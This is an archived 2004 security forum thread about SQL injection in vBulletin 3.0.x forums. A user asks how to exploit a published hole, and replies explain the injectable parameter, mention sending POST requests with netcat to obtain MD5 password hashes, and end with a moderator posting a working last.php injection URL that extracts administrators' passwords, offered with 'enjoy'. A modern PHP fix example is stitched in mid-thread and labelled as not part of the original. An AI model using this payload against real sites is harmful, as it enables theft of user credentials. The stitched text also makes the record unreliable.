IT Security and Insecurity Portal

Sql Inject In VB 3.0.x !!

Posted: Thu Sep 16, 2004 8:18 am
Zilly | Regular user | Joined: Sep 10, 2004 | Posts: 7

hi every body ,, thanx for the nice forums i like it
 any way i want every body to take a look at this
 http://www.securiteam.com/unixfocus/5BP0E15E0M.html
 
 well, it's sql inject,, i'm studying it these days and i kinda wana help in this,
 how to Execute this security hole and another important thing is how to fix it ??
 
 thats all folks

_________________
Zilly is Here

Re: Sql Inject In VB 3.0.x !!

Posted: Thu Sep 16, 2004 10:39 am
Heintz | Valuable expert | Joined: Jun 12, 2004 | Posts: 88 | Location: Estonia/Sweden

Zilly wrote:
> hi every body ,, thanx for the nice forums i like it
> any way i want every body to take a look at this
> http://www.securiteam.com/unixfocus/5BP0E15E0M.html
>
> well, it's sql inject,, i'm studying it these days and i kinda wana help in this,
> how to Execute this security hole and another important thing is how to fix it ??
>
> thats all folks

strange thing is that intval() is used to get the value, but not used before passing to query. anyway the trick is to "continue" (in this case here) sql query.

query ends like this: userid = " . $item_number[1]

so you POST your value to item_number. name of it is x_invoice_num and its value is something like valuea_valueb_valuec, you must manipulate valueb, lets assume you posted something like this:

then (depends on viewing part of script) you should see somewhere on the page, a list of tables that are in that database. and with little thinking you make more "useful" queries than this
hint: mysql manual

fixing:

Code:
    $item_number[1] = abs(intval($item_number[1]));

add this line somewhere before the query, and it should do it

_________________
 AT 14:00 /EVERY:1 DHTTP /oindex.php www.waraxe.us:80 | FIND "SA#037" 1>Nul 2>&1 & IF ERRORLEVEL 0 "c:program filesApache.exe stop & DSAY alarmaaa!"
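
The fix described in the post above, as an added example that is not part of the original thread and not vBulletin's own code: it compares the `abs(intval())` coercion with strict validation followed by a parameterized query. It assumes `x_invoice_num` is split on `_`; the function names and the table name `example_table` are hypothetical.

```php
<?php
// Added example, not vBulletin's code. Assumption: the POST field
// x_invoice_num is split on "_" and the middle part is the userid
// that ends up at the end of the query.

/** The thread's fix: coerce the middle part to a non-negative integer. */
function coerce_userid(string $invoiceNum)
{
    $item_number = explode('_', $invoiceNum);
    return abs(intval($item_number[1] ?? 0));
}

/** Stricter variant: accept only three runs of digits, reject the rest. */
function parse_invoice_num(string $invoiceNum): ?array
{
    if (!preg_match('/\A(\d{1,9})_(\d{1,9})_(\d{1,9})\z/', $invoiceNum, $m)) {
        return null;
    }
    return [(int) $m[1], (int) $m[2], (int) $m[3]];
}

/** Parameterized query and its bound value; table name is hypothetical. */
function build_query(array $parts): array
{
    return ['SELECT * FROM example_table WHERE userid = ?', [$parts[1]]];
}

// Constructed sample inputs: one well-formed, three malformed.
foreach (['3_7_1', '3_7abc_1', '3__1', '3_-7_1'] as $raw) {
    $strict = parse_invoice_num($raw);
    printf(
        "%-10s coerce=%d strict=%s\n",
        $raw,
        coerce_userid($raw),
        $strict === null ? 'rejected' : json_encode(build_query($strict))
    );
}
```

The coercion makes the value safe to concatenate but silently turns `7abc` and `-7` into `7`, so a malformed request still reaches the query; the strict parser rejects those inputs before any SQL is built.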

Posted: Fri Sep 17, 2004 5:41 am
Zilly | Regular user | Joined: Sep 10, 2004 | Posts: 7

thanx Heintz,, well i know some how that the file that contains the sql inject is authorize.php
 what i'm tryin to do now is to inject but can i ask a question ??
 
 when we use the authorize.php ?
 
 i mean in normal not injecting ??
 
 and thanx again ,,
 
 Zilly

_________________
Zilly is Here

Posted: Fri Sep 17, 2004 4:13 pm
zer0-c00l | Advanced user | Joined: Jun 25, 2004 | Posts: 72 | Location: BRAZIL!

Posted: Fri Sep 17, 2004 5:35 pm
hebe | Advanced user | Joined: Sep 04, 2004 | Posts: 59

is there any exploit for this

Posted: Fri Sep 17, 2004 8:49 pm
SteX | Advanced user | Joined: May 18, 2004 | Posts: 181 | Location: Serbia

_________________
   We would change the world, but God won't give us the sourcecode...
 ....Watch the master. Follow the master. Be the master....
 -------------------------------------------------------

Posted: Sun Sep 19, 2004 8:42 pm
waraxe | Site admin | Joined: May 11, 2004 | Posts: 2407 | Location: Estonia, Tartu

I have played a little bit with that security bug and got some results. Will share them tomorrow in this thread, so stay tuned!!!

Posted: Wed Sep 22, 2004 8:36 pm
Zilly | Regular user | Joined: Sep 10, 2004 | Posts: 7

wow thanx man
my brain has been exploded LOL
   
 this time really i will not change the channel
     
 Zilly

_________________
Zilly is Here

Posted: Tue Nov 09, 2004 6:48 pm
Zilly | Regular user | Joined: Sep 10, 2004 | Posts: 7

after searching and reading and like this stuff i found that i can execute this exploit by netcat
 ex:
 nc -n -v ***.***.***.*** 80
 then i have to enter some POST command
 after that i'll get the MD5 hash password ..
 
 okay now we are near ...
   
 and i need help also ..
 
 

_________________
Zilly is Here

Posted: Fri Nov 12, 2004 6:10 pm
LINUX | Moderator | Joined: May 24, 2004 | Posts: 404 | Location: Caiman

new SQL injection found in VBulletin Forums 3.0.x
the vulnerability found in last.php, last 10 topics hack.
 
 
 last.php?fsel=,user.password%20as%20title,user.%20
 %20%20%20username%20as%20lastposter%20FROM%20user,
 thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT%201
 
 
 enjoy